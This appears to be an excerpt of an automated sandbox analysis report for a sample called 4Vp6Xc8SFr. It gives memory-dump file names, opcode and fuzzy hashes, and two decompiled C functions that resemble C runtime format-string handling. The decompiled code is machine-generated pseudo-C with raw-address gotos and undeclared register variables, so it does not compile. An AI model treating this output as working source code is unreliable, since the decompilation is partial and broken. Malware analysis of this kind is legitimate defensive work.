GetProcessHeap.KERNEL32 ref: 00007FF7DA8F24F4

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: a2b3f694270b62c60b501e12e715d3f407241b3ad344c0bceac092333339d66b
Instruction ID: 19acfdd24317bca7258cad8a3a042bc97ed8032bc61d03469ca5198c821eaad7
Opcode Fuzzy Hash: a2b3f694270b62c60b501e12e715d3f407241b3ad344c0bceac092333339d66b
Instruction Fuzzy Hash: B6B09220E0BB07C6FA493B116C82218A3A47F98710FE904BAC84D81321DF2C20F5A720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E2750 Relevance: .3, Instructions: 327
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E00007FF77FF7DA8E2750(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				char _v68;
				char _v70;
				signed int _v72;
				long long _v88;
				void* __rbp;
				void* _t111;
				void* _t112;
				void* _t140;
				char _t147;
				void* _t151;
				unsigned int _t156;
				signed char _t157;
				signed int _t160;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t185;
				signed long long _t231;
				void* _t247;
				intOrPtr _t258;
				intOrPtr _t261;
				intOrPtr* _t265;
				void* _t270;
				intOrPtr _t276;
				signed int* _t278;
				void* _t282;
				void* _t283;
				void* _t286;
				void* _t293;
				intOrPtr* _t294;

				_t286 = __r8;
				_t280 = __rsi;
				_t277 = __rdi;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t282 = _t283;
				_t284 = _t283 - 0x50;
				_t231 =  *0xda90d008; // 0xde4e6c2f3c2e
				_v56 = _t231 ^ _t283 - 0x00000050;
				_t247 = __rcx;
				_t147 =  *((char*)(__rcx + 0x39));
				_t6 = _t277 - 0x77; // 0x1
				r13d = _t6;
				_t178 = _t147 - 0x64;
				if (_t178 > 0) goto 0xda8e2805;
				if (_t178 == 0) goto 0xda8e282f;
				_t179 = _t147 - 0x53;
				if (_t179 > 0) goto 0xda8e27cd;
				if (_t179 == 0) goto 0xda8e2876;
				if (_t179 == 0) goto 0xda8e27c0;
				if (_t179 == 0) goto 0xda8e27e9;
				if (_t179 == 0) goto 0xda8e27c0;
				_t151 = _t147 - 0x3d - r13d;
				if (_t179 == 0) goto 0xda8e27c0;
				if (_t151 != r13d) goto 0xda8e289d;
				_t111 = E00007FF77FF7DA8E30B4(0x78, __rcx, __rcx, __rsi, _t282);
				goto 0xda8e2899;
				if (_t151 == 0x58) goto 0xda8e288e;
				if (_t151 == 0x5a) goto 0xda8e27f8;
				if (_t151 == 0x61) goto 0xda8e27c0;
				if (_t151 != 0x63) goto 0xda8e289d;
				_t112 = E00007FF77FF7DA8E3570(_t111, _t151 - 0x63, __rcx, __rcx);
				goto 0xda8e2899;
				E00007FF77FF7DA8E2FB8(_t112, __rcx);
				goto 0xda8e2899;
				_t185 = _t151 - 0x6f;
				if (_t185 > 0) goto 0xda8e285f;
				if (_t185 == 0) goto 0xda8e283f;
				if (_t185 == 0) goto 0xda8e27c0;
				if (_t185 == 0) goto 0xda8e27c0;
				if (_t185 == 0) goto 0xda8e27c0;
				if (_t185 == 0) goto 0xda8e282f;
				if (_t151 - 0x65 - r13d - r13d - 2 != 5) goto 0xda8e289d;
				E00007FF77FF7DA8E3708(__rcx, __rcx);
				goto 0xda8e2899;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
				E00007FF77FF7DA8E0D00(0, __rcx, __rcx, __rdi, _t280, _t282);
				goto 0xda8e2899;
				_t156 =  *(__rcx + 0x28);
				if ((r13b & _t156 >> 0x00000005) == 0) goto 0xda8e2853;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x28) = _t156;
				E00007FF77FF7DA8E08F0(0, __rcx, __rcx, _t277, _t280, _t282);
				goto 0xda8e2899;
				if (_t156 == 0x70) goto 0xda8e2880;
				if (_t156 == 0x73) goto 0xda8e2876;
				if (_t156 == 0x75) goto 0xda8e2833;
				if (_t156 != 0x78) goto 0xda8e289d;
				goto 0xda8e2891;
				E00007FF77FF7DA8E37C0(__rcx);
				goto 0xda8e2899;
				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
				if (E00007FF77FF7DA8E1110(r13b, __rcx, __rcx, _t277, _t280, _t282) != 0) goto 0xda8e28a4;
				goto 0xda8e2b27;
				if ( *((char*)(__rcx + 0x38)) != 0) goto 0xda8e2b24;
				_t157 =  *(__rcx + 0x28);
				_v72 = 0;
				_v70 = 0;
				if ((r13b & 0) == 0) goto 0xda8e28f1;
				if ((r13b & 0) == 0) goto 0xda8e28d6;
				_v72 = 0x2d;
				goto 0xda8e28ee;
				if ((r13b & _t157) == 0) goto 0xda8e28e1;
				_v72 = 0x2b;
				goto 0xda8e28ee;
				if ((r13b & 0) == 0) goto 0xda8e28f1;
				_v72 = 0x20;
				_t270 = _t293;
				r8b =  *((intOrPtr*)(__rcx + 0x39));
				if (0 != 0) goto 0xda8e290c;
				if ((r13b & 0) == 0) goto 0xda8e290c;
				r9b = r13b;
				goto 0xda8e290f;
				r9b = 0;
				if (r9b != 0) goto 0xda8e2921;
				if (0 == 0) goto 0xda8e293e;
				 *((char*)(_t282 + _t270 - 0x20)) = 0x30;
				if (r8b == 0x58) goto 0xda8e2932;
				if (r8b != 0x41) goto 0xda8e2935;
				dil = 0x58;
				 *((intOrPtr*)(_t282 + _t270 - 0x1f)) = dil;
				_t177 =  *((intOrPtr*)(__rcx + 0x2c)) -  *((intOrPtr*)(__rcx + 0x48));
				if ((_t157 & 0x0000000c) != 0) goto 0xda8e29b0;
				r9d = 0;
				if (_t177 <= 0) goto 0xda8e29b0;
				r8d =  *(__rcx + 0x20);
				_t258 =  *((intOrPtr*)(__rcx + 0x460));
				if ( *((intOrPtr*)(_t258 + 0x10)) !=  *((intOrPtr*)(_t258 + 8))) goto 0xda8e297c;
				if ( *((char*)(_t258 + 0x18)) == 0) goto 0xda8e2972;
				r8d = r8d + 1;
				goto 0xda8e2976;
				r8d = r8d | 0xffffffff;
				 *(__rcx + 0x20) = r8d;
				goto 0xda8e299e;
				 *(__rcx + 0x20) = _t286 + 1;
				 *((intOrPtr*)(_t258 + 0x10)) =  *((intOrPtr*)(_t258 + 0x10)) + _t293;
				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))))) = 0x20;
				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) + _t293;
				r8d =  *(__rcx + 0x20);
				if (r8d == 0xffffffff) goto 0xda8e29b0;
				r9d = r9d + r13d;
				if (r9d - _t177 < 0) goto 0xda8e2956;
				_t63 = _t247 + 0x20; // 0x78
				_t278 = _t63;
				r8d = 0;
				_v88 =  *((intOrPtr*)(__rcx + 8));
				_t65 = _t247 + 0x460; // 0x4b8
				_t294 = _t65;
				E00007FF77FF7DA8E39E8(_t286 + 1, 0x78, _t177, __rcx, _t294, _t278, _t280, _t282, _t278);
				if ((r13b & 0) == 0) goto 0xda8e2a39;
				if ((r13b &  *(__rcx + 0x28) >> 0x00000002) != 0) goto 0xda8e2a39;
				r8d = 0;
				if (_t177 <= 0) goto 0xda8e2a39;
				_t261 =  *_t294;
				if ( *((intOrPtr*)(_t261 + 0x10)) !=  *((intOrPtr*)(_t261 + 8))) goto 0xda8e2a12;
				if ( *((char*)(_t261 + 0x18)) == 0) goto 0xda8e2a0b;
				goto 0xda8e2a0e;
				 *_t278 =  *_t278 + 0x00000001 | 0xffffffff;
				goto 0xda8e2a2a;
				 *_t278 =  &(( &_v72)[0]);
				 *((intOrPtr*)(_t261 + 0x10)) =  *((intOrPtr*)(_t261 + 0x10)) + _t293;
				 *((char*)( *((intOrPtr*)( *_t294)))) = 0x30;
				 *((intOrPtr*)( *_t294)) =  *((intOrPtr*)( *_t294)) + _t293;
				if ( *_t278 == 0xffffffff) goto 0xda8e2a39;
				r8d = r8d + r13d;
				if (r8d - _t177 < 0) goto 0xda8e29f4;
				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0xda8e2aab;
				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0xda8e2aab;
				r15d = 0;
				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
				_v72 = _v72 & 0x00000000;
				r8d = 6;
				_v88 =  *((intOrPtr*)(__rcx + 8));
				if (E00007FF77FF7DA8ED950( *((intOrPtr*)(__rcx + 8)), __rcx,  &_v72,  &_v68, _t282, _t286) != 0) goto 0xda8e2aa6;
				r8d = _v72;
				if (r8d == 0) goto 0xda8e2aa6;
				_v88 =  *((intOrPtr*)(_t247 + 8));
				_t140 = E00007FF77FF7DA8E39E8(_t139, 0x78, _t177, _t247, _t294, _t278, _t280, _t282, _t278);
				r15d = r15d + r13d;
				if (r15d !=  *(_t247 + 0x48)) goto 0xda8e2a4c;
				goto 0xda8e2ac7;
				 *_t278 =  *_t278 | 0xffffffff;
				goto 0xda8e2ac7;
				r8d =  *(_t247 + 0x48);
				_t265 = _t294;
				_v88 =  *((intOrPtr*)(_t247 + 8));
				E00007FF77FF7DA8E39E8(_t140, 0x78, _t177, _t247, _t265, _t278, _t280, _t282, _t278);
				_t160 =  *_t278;
				if (_t160 < 0) goto 0xda8e2b24;
				if ((r13b & 0) == 0) goto 0xda8e2b24;
				r8d = 0;
				if (_t177 <= 0) goto 0xda8e2b24;
				_t276 =  *_t294;
				if ( *((intOrPtr*)(_t276 + 0x10)) !=  *((intOrPtr*)(_t276 + 8))) goto 0xda8e2afd;
				if ( *((char*)(_t276 + 0x18)) == 0) goto 0xda8e2af6;
				goto 0xda8e2af9;
				 *_t278 = _t160 + 0x00000001 | 0xffffffff;
				goto 0xda8e2b15;
				 *_t278 = _t265 + 1;
				 *((intOrPtr*)(_t276 + 0x10)) =  *((intOrPtr*)(_t276 + 0x10)) + _t293;
				 *((char*)( *((intOrPtr*)( *_t294)))) = 0x20;
				 *((intOrPtr*)( *_t294)) =  *((intOrPtr*)( *_t294)) + _t293;
				if ( *_t278 == 0xffffffff) goto 0xda8e2b24;
				r8d = r8d + r13d;
				if (r8d - _t177 < 0) goto 0xda8e2adf;
				return E00007FF77FF7DA8DACF0(r13b,  *_t278, _v56 ^ _t284);
			}

0x7ff7da8e2750
0x7ff7da8e2750
0x7ff7da8e2750
0x7ff7da8e2750
0x7ff7da8e2755
0x7ff7da8e275a
0x7ff7da8e2768
0x7ff7da8e276b
0x7ff7da8e276f
0x7ff7da8e2779
0x7ff7da8e2782
0x7ff7da8e2785
0x7ff7da8e2789
0x7ff7da8e2789
0x7ff7da8e278d
0x7ff7da8e2790
0x7ff7da8e2792
0x7ff7da8e2798
0x7ff7da8e279b
0x7ff7da8e279d
0x7ff7da8e27a6
0x7ff7da8e27ab
0x7ff7da8e27b0
0x7ff7da8e27b2
0x7ff7da8e27b5
0x7ff7da8e27ba
0x7ff7da8e27c3
0x7ff7da8e27c8
0x7ff7da8e27d0
0x7ff7da8e27d9
0x7ff7da8e27de
0x7ff7da8e27e3
0x7ff7da8e27ee
0x7ff7da8e27f3
0x7ff7da8e27fb
0x7ff7da8e2800
0x7ff7da8e2805
0x7ff7da8e2808
0x7ff7da8e280a
0x7ff7da8e280f
0x7ff7da8e2814
0x7ff7da8e2819
0x7ff7da8e281e
0x7ff7da8e2823
0x7ff7da8e2828
0x7ff7da8e282d
0x7ff7da8e282f
0x7ff7da8e2838
0x7ff7da8e283d
0x7ff7da8e283f
0x7ff7da8e284a
0x7ff7da8e284c
0x7ff7da8e2850
0x7ff7da8e2858
0x7ff7da8e285d
0x7ff7da8e2862
0x7ff7da8e2867
0x7ff7da8e286c
0x7ff7da8e2870
0x7ff7da8e2874
0x7ff7da8e2879
0x7ff7da8e287e
0x7ff7da8e2880
0x7ff7da8e2887
0x7ff7da8e289b
0x7ff7da8e289f
0x7ff7da8e28a8
0x7ff7da8e28ae
0x7ff7da8e28b3
0x7ff7da8e28b9
0x7ff7da8e28c4
0x7ff7da8e28ce
0x7ff7da8e28d0
0x7ff7da8e28d4
0x7ff7da8e28d9
0x7ff7da8e28db
0x7ff7da8e28df
0x7ff7da8e28e8
0x7ff7da8e28ea
0x7ff7da8e28ee
0x7ff7da8e28f1
0x7ff7da8e28fb
0x7ff7da8e2905
0x7ff7da8e2907
0x7ff7da8e290a
0x7ff7da8e290c
0x7ff7da8e291b
0x7ff7da8e291f
0x7ff7da8e2921
0x7ff7da8e292a
0x7ff7da8e2930
0x7ff7da8e2932
0x7ff7da8e2935
0x7ff7da8e2943
0x7ff7da8e2949
0x7ff7da8e294b
0x7ff7da8e2950
0x7ff7da8e2952
0x7ff7da8e2956
0x7ff7da8e2965
0x7ff7da8e296b
0x7ff7da8e296d
0x7ff7da8e2970
0x7ff7da8e2972
0x7ff7da8e2976
0x7ff7da8e297a
0x7ff7da8e2980
0x7ff7da8e2983
0x7ff7da8e2991
0x7ff7da8e299b
0x7ff7da8e299e
0x7ff7da8e29a6
0x7ff7da8e29a8
0x7ff7da8e29ae
0x7ff7da8e29b4
0x7ff7da8e29b4
0x7ff7da8e29b8
0x7ff7da8e29bb
0x7ff7da8e29c0
0x7ff7da8e29c0
0x7ff7da8e29d1
0x7ff7da8e29e1
0x7ff7da8e29e9
0x7ff7da8e29eb
0x7ff7da8e29f0
0x7ff7da8e29f4
0x7ff7da8e29ff
0x7ff7da8e2a05
0x7ff7da8e2a09
0x7ff7da8e2a0e
0x7ff7da8e2a10
0x7ff7da8e2a15
0x7ff7da8e2a17
0x7ff7da8e2a21
0x7ff7da8e2a27
0x7ff7da8e2a2f
0x7ff7da8e2a31
0x7ff7da8e2a37
0x7ff7da8e2a3d
0x7ff7da8e2a43
0x7ff7da8e2a49
0x7ff7da8e2a54
0x7ff7da8e2a5d
0x7ff7da8e2a66
0x7ff7da8e2a6c
0x7ff7da8e2a78
0x7ff7da8e2a7a
0x7ff7da8e2a81
0x7ff7da8e2a8e
0x7ff7da8e2a96
0x7ff7da8e2a9b
0x7ff7da8e2aa2
0x7ff7da8e2aa4
0x7ff7da8e2aa6
0x7ff7da8e2aa9
0x7ff7da8e2ab2
0x7ff7da8e2ab6
0x7ff7da8e2abd
0x7ff7da8e2ac2
0x7ff7da8e2ac7
0x7ff7da8e2acb
0x7ff7da8e2ad6
0x7ff7da8e2ad8
0x7ff7da8e2add
0x7ff7da8e2adf
0x7ff7da8e2aea
0x7ff7da8e2af0
0x7ff7da8e2af4
0x7ff7da8e2af9
0x7ff7da8e2afb
0x7ff7da8e2b00
0x7ff7da8e2b02
0x7ff7da8e2b0c
0x7ff7da8e2b12
0x7ff7da8e2b1a
0x7ff7da8e2b1c
0x7ff7da8e2b22
0x7ff7da8e2b50

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d8f1067b5d5c3e04637915c4ebd89aac0893348790f1f4dfb457941e20f862b
Instruction ID: b3c5d985f80c705e5029723a518139b511d33b9c0c626c3749107793904fd25a
Opcode Fuzzy Hash: 6d8f1067b5d5c3e04637915c4ebd89aac0893348790f1f4dfb457941e20f862b
Instruction Fuzzy Hash: 71D1F722A08652C5FF2AAE25841063DE3A0FF65B48FD45176CE0D07696EF3EDA71C361

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D9CE0 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a778647451e1f32c32080f116e5ee3930617f0b1c68867123a58e5278e899afb
Instruction ID: ca55278051097338406149ba657d3104fc70fb43c10b7e32fc2f8d8579faf01b
Opcode Fuzzy Hash: a778647451e1f32c32080f116e5ee3930617f0b1c68867123a58e5278e899afb
Instruction Fuzzy Hash: 0FC10A721181E04BD689EB29E45A87A73D0F788309FD4443BEF9B67B86C63CE514D721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E1DC0 Relevance: .2, Instructions: 241
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E00007FF77FF7DA8E1DC0(signed int __esi, long long __rbx, long long __rcx, long long __rdi, long long __rsi, signed int __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
				long long _v16;
				long long _v24;
				intOrPtr _t112;
				signed int _t116;
				intOrPtr _t120;
				signed int _t121;
				signed int _t142;
				signed int _t150;
				void* _t172;
				intOrPtr _t173;
				signed char* _t183;
				signed char* _t188;
				long long _t190;
				signed char* _t193;
				intOrPtr* _t198;
				signed int* _t199;
				signed char** _t202;
				signed char** _t204;
				void* _t207;
				intOrPtr _t212;
				signed int _t216;
				void* _t218;
				void* _t221;
				void* _t223;

				_t221 = __r8;
				_t216 = __rbp;
				_t214 = __rsi;
				_t172 = _t218;
				 *((long long*)(_t172 + 8)) = __rbx;
				 *((long long*)(_t172 + 0x10)) = __rbp;
				 *((long long*)(_t172 + 0x18)) = __rsi;
				 *((long long*)(_t172 + 0x20)) = __rdi;
				_t173 =  *((intOrPtr*)(__rcx + 8));
				_t142 = __esi | 0xffffffff;
				_t190 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x460)) != __rbp) goto 0xda8e1dfe;
				 *((char*)(_t173 + 0x30)) = 1;
				 *((intOrPtr*)(_t173 + 0x2c)) = 0x16;
				goto 0xda8e2123;
				_t193 =  *((intOrPtr*)(__rcx + 0x10));
				if (_t193 != 0) goto 0xda8e1e35;
				 *((char*)(_t173 + 0x30)) = 1;
				r9d = 0;
				 *((intOrPtr*)(_t173 + 0x2c)) = 0x16;
				r8d = 0;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = __rbp;
				E00007FF77FF7DA8E9C34( *((intOrPtr*)(__rcx + 8)), __rcx, _t193, _t207, __rsi, __rbp, __r8);
				goto 0xda8e20c9;
				_t112 =  *((intOrPtr*)(_t190 + 0x468)) + 1;
				 *((intOrPtr*)(_t190 + 0x468)) = _t112;
				if (_t112 == 2) goto 0xda8e20c6;
				 *((intOrPtr*)(_t190 + 0x48)) = 0;
				 *(_t190 + 0x24) = bpl;
				r8b =  *_t193;
				goto 0xda8e20a2;
				if ( *(_t190 + 0x20) < 0) goto 0xda8e20b3;
				_t20 = _t221 - 0x20; // -32
				if (_t20 - 0x5a > 0) goto 0xda8e1e88;
				goto 0xda8e1e8b;
				_t116 =  *(0xda9014e0 + (r8b - 0x20 +  &(_t193[1]) * 8) * 2) & 0x000000ff;
				 *(_t190 + 0x24) = _t116;
				if (_t116 - 8 >= 0) goto 0xda8e2110;
				_t150 = _t116;
				if (_t150 == 0) goto 0xda8e1fcb;
				if (_t150 == 0) goto 0xda8e1fb4;
				if (_t150 == 0) goto 0xda8e1f65;
				if (_t150 == 0) goto 0xda8e1f2c;
				if (_t150 == 0) goto 0xda8e1f24;
				if (_t150 == 0) goto 0xda8e1ef6;
				if (_t150 == 0) goto 0xda8e1eec;
				if (_t116 - 0xfffffffffffffffc != 1) goto 0xda8e213c;
				E00007FF77FF7DA8E2750(_t190, _t190, r8b - 0x20 +  &(_t193[1]) * 8, __rdi, _t214, _t221);
				goto 0xda8e1f58;
				E00007FF77FF7DA8E2418(_t190, _t223);
				goto 0xda8e1f58;
				if (r8b == 0x2a) goto 0xda8e1f0a;
				E00007FF77FF7DA8E1CA0(_t190, _t190, _t190 + 0x30, _t214);
				goto 0xda8e1f58;
				_t198 =  *(_t190 + 0x18);
				 *(_t190 + 0x18) = _t198 + 8;
				_t120 =  *_t198;
				_t138 =  <  ? _t142 : _t120;
				 *(_t190 + 0x30) =  <  ? _t142 : _t120;
				goto 0xda8e1f56;
				 *(_t190 + 0x30) = 0;
				goto 0xda8e2097;
				if (r8b == 0x2a) goto 0xda8e1f38;
				goto 0xda8e1f00;
				_t199 =  *(_t190 + 0x18);
				 *(_t190 + 0x18) =  &(_t199[2]);
				_t121 =  *_t199;
				 *(_t190 + 0x2c) = _t121;
				if (_t121 >= 0) goto 0xda8e1f56;
				 *(_t190 + 0x28) =  *(_t190 + 0x28) | 0x00000004;
				 *(_t190 + 0x2c) =  ~_t121;
				if (1 == 0) goto 0xda8e213c;
				goto 0xda8e2097;
				if (r8b == 0x20) goto 0xda8e1fab;
				if (r8b == 0x23) goto 0xda8e1fa2;
				if (r8b == 0x2b) goto 0xda8e1f99;
				if (r8b == 0x2d) goto 0xda8e1f90;
				if (r8b != 0x30) goto 0xda8e2097;
				 *(_t190 + 0x28) =  *(_t190 + 0x28) | 0x00000008;
				goto 0xda8e2097;
				 *(_t190 + 0x28) =  *(_t190 + 0x28) | 0x00000004;
				goto 0xda8e2097;
				 *(_t190 + 0x28) =  *(_t190 + 0x28) | 0x00000001;
				goto 0xda8e2097;
				 *(_t190 + 0x28) =  *(_t190 + 0x28) | 0x00000020;
				goto 0xda8e2097;
				 *(_t190 + 0x28) =  *(_t190 + 0x28) | 0x00000002;
				goto 0xda8e2097;
				 *(_t190 + 0x28) = _t216;
				 *(_t190 + 0x38) = bpl;
				 *(_t190 + 0x30) = _t142;
				 *((intOrPtr*)(_t190 + 0x34)) = 0;
				 *(_t190 + 0x4c) = bpl;
				goto 0xda8e2097;
				_t212 =  *((intOrPtr*)(_t190 + 8));
				 *(_t190 + 0x4c) = bpl;
				if ( *((intOrPtr*)(_t212 + 0x28)) != bpl) goto 0xda8e1fe1;
				E00007FF77FF7DA8E3970( &(_t199[2]), _t190, _t212, _t214);
				if (r8d - _t142 < 0) goto 0xda8e2058;
				if (( *( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x18)))) +  *(_t190 + 0x39) * 2) & 0x00008000) == 0) goto 0xda8e2058;
				_t202 =  *(_t190 + 0x460);
				if ( *((intOrPtr*)(_t202 + 0x10)) !=  *((intOrPtr*)(_t202 + 8))) goto 0xda8e201f;
				if ( *((intOrPtr*)(_t202 + 0x18)) == bpl) goto 0xda8e201a;
				 *(_t190 + 0x20) =  *(_t190 + 0x20) + 1;
				goto 0xda8e203d;
				 *(_t190 + 0x20) = _t142;
				goto 0xda8e203d;
				 *(_t190 + 0x20) =  *(_t190 + 0x20) + 1;
				 *((long long*)(_t202 + 0x10)) =  *((long long*)(_t202 + 0x10)) + 1;
				 *( *( *(_t190 + 0x460))) = r8b;
				 *( *(_t190 + 0x460)) =  &(( *( *(_t190 + 0x460)))[1]);
				_t183 =  *(_t190 + 0x10);
				r8b =  *_t183;
				 *(_t190 + 0x10) =  &(_t183[1]);
				 *(_t190 + 0x39) = r8b;
				if (r8b == 0) goto 0xda8e20e4;
				_t204 =  *(_t190 + 0x460);
				if ( *((intOrPtr*)(_t204 + 0x10)) !=  *((intOrPtr*)(_t204 + 8))) goto 0xda8e2079;
				if ( *((intOrPtr*)(_t204 + 0x18)) == bpl) goto 0xda8e2074;
				 *(_t190 + 0x20) =  *(_t190 + 0x20) + 1;
				goto 0xda8e2097;
				 *(_t190 + 0x20) = _t142;
				goto 0xda8e2097;
				 *(_t190 + 0x20) =  *(_t190 + 0x20) + 1;
				 *((long long*)(_t204 + 0x10)) =  *((long long*)(_t204 + 0x10)) + 1;
				 *( *( *(_t190 + 0x460))) = r8b;
				 *( *(_t190 + 0x460)) =  &(( *( *(_t190 + 0x460)))[1]);
				_t188 =  *(_t190 + 0x10);
				r8b =  *_t188;
				 *(_t190 + 0x10) =  &(_t188[1]);
				 *(_t190 + 0x39) = r8b;
				if (r8b != 0) goto 0xda8e1e65;
				 *((intOrPtr*)(_t190 + 0x468)) =  *((intOrPtr*)(_t190 + 0x468)) + 1;
				if ( *((intOrPtr*)(_t190 + 0x468)) != 2) goto 0xda8e1e53;
				return  *(_t190 + 0x20);
			}

0x7ff7da8e1dc0
0x7ff7da8e1dc0
0x7ff7da8e1dc0
0x7ff7da8e1dc0
0x7ff7da8e1dc3
0x7ff7da8e1dc7
0x7ff7da8e1dcb
0x7ff7da8e1dcf
0x7ff7da8e1dd9
0x7ff7da8e1ddd
0x7ff7da8e1de2
0x7ff7da8e1dec
0x7ff7da8e1dee
0x7ff7da8e1df2
0x7ff7da8e1df9
0x7ff7da8e1dfe
0x7ff7da8e1e05
0x7ff7da8e1e07
0x7ff7da8e1e0b
0x7ff7da8e1e0e
0x7ff7da8e1e15
0x7ff7da8e1e1e
0x7ff7da8e1e23
0x7ff7da8e1e28
0x7ff7da8e1e30
0x7ff7da8e1e3b
0x7ff7da8e1e3d
0x7ff7da8e1e46
0x7ff7da8e1e53
0x7ff7da8e1e56
0x7ff7da8e1e5a
0x7ff7da8e1e60
0x7ff7da8e1e68
0x7ff7da8e1e6e
0x7ff7da8e1e74
0x7ff7da8e1e86
0x7ff7da8e1e99
0x7ff7da8e1e9e
0x7ff7da8e1ea3
0x7ff7da8e1eab
0x7ff7da8e1ead
0x7ff7da8e1eb6
0x7ff7da8e1ebf
0x7ff7da8e1ec8
0x7ff7da8e1ecd
0x7ff7da8e1ed2
0x7ff7da8e1ed7
0x7ff7da8e1edc
0x7ff7da8e1ee5
0x7ff7da8e1eea
0x7ff7da8e1eef
0x7ff7da8e1ef4
0x7ff7da8e1efa
0x7ff7da8e1f03
0x7ff7da8e1f08
0x7ff7da8e1f0a
0x7ff7da8e1f12
0x7ff7da8e1f16
0x7ff7da8e1f1c
0x7ff7da8e1f1f
0x7ff7da8e1f22
0x7ff7da8e1f24
0x7ff7da8e1f27
0x7ff7da8e1f30
0x7ff7da8e1f36
0x7ff7da8e1f38
0x7ff7da8e1f40
0x7ff7da8e1f44
0x7ff7da8e1f46
0x7ff7da8e1f4b
0x7ff7da8e1f4d
0x7ff7da8e1f53
0x7ff7da8e1f5a
0x7ff7da8e1f60
0x7ff7da8e1f69
0x7ff7da8e1f6f
0x7ff7da8e1f75
0x7ff7da8e1f7b
0x7ff7da8e1f81
0x7ff7da8e1f87
0x7ff7da8e1f8b
0x7ff7da8e1f90
0x7ff7da8e1f94
0x7ff7da8e1f99
0x7ff7da8e1f9d
0x7ff7da8e1fa2
0x7ff7da8e1fa6
0x7ff7da8e1fab
0x7ff7da8e1faf
0x7ff7da8e1fb4
0x7ff7da8e1fb8
0x7ff7da8e1fbc
0x7ff7da8e1fbf
0x7ff7da8e1fc2
0x7ff7da8e1fc6
0x7ff7da8e1fcb
0x7ff7da8e1fcf
0x7ff7da8e1fd7
0x7ff7da8e1fdc
0x7ff7da8e1fe9
0x7ff7da8e1ffc
0x7ff7da8e1ffe
0x7ff7da8e200d
0x7ff7da8e2013
0x7ff7da8e2015
0x7ff7da8e2018
0x7ff7da8e201a
0x7ff7da8e201d
0x7ff7da8e201f
0x7ff7da8e2022
0x7ff7da8e2030
0x7ff7da8e203a
0x7ff7da8e203d
0x7ff7da8e2041
0x7ff7da8e2047
0x7ff7da8e204b
0x7ff7da8e2052
0x7ff7da8e2058
0x7ff7da8e2067
0x7ff7da8e206d
0x7ff7da8e206f
0x7ff7da8e2072
0x7ff7da8e2074
0x7ff7da8e2077
0x7ff7da8e2079
0x7ff7da8e207c
0x7ff7da8e208a
0x7ff7da8e2094
0x7ff7da8e2097
0x7ff7da8e209b
0x7ff7da8e20a2
0x7ff7da8e20a6
0x7ff7da8e20ad
0x7ff7da8e20b3
0x7ff7da8e20c0
0x7ff7da8e20e3

Memory Dump Source

